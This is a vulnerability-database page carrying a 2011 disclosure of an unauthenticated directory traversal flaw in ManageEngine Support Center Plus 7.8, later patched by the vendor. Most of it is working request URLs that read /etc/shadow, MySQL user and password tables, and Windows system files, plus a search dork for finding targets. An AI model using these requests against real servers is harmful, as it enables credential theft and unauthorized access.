Vulners
Lucene search
ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
Advisory:
ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal Vulnerability
Author:
Robert 'xistence' van Hamburg - xistence<AT>0x90.nl
Software link:
http://www.manageengine.com/products/support-center/download.html
Tested on:
Linux & Windows
Category:
Directory Traversal
Severity:
High
Google Dork: intitle:ManageEngine SupportCenter Plus
Description:
It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
This for example makes it possible to grab for the "/etc/shadow" file on a linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.
Requests Linux:
Grab the /etc/passwd & /etc/shadow:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=passwd&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=shadow&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&delete=false
In a default situation the databasename is "supportcenter" and so it's easy to retrieve the database files like this:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fibdata1&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile0&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile0&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ib_logfile1&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fib_logfile1&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaapassword.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaapassword.frm&delete=false
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=aaauser.frm&module=Request&ID=1&path=..%2Fmysql%2Fdata%2Fsupportcenter%2Faaauser.frm&delete=false
Requests Windows:
Hosts file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=hosts&module=Request&ID=1&path=..\..\..\..\..\..\Windows\system32\drivers\etc\hosts&delete=false
Explorer.exe:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=explorer.exe&module=Request&ID=1&path=..\..\..\..\..\..\Windows\explorer.exe&delete=false
MySQL database ibdata1 file:
http://<SUPPORTCENTERURL>/workorder/FileDownload.jsp?FILENAME=ibdata1&module=Request&ID=1&path=..\..\mysql\data\ibdata1&delete=false
Disclosure:
- May 30 2011, vulnerability found
- May 30 2011, contacted vendor (ManageEngine) about security issues
- Jun 1 2011, vulnerability fixed by vendor (ManageEngine) and released as patch 7803Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jun 2011 00:00Current
7.4High risk
Vulners AI Score7.4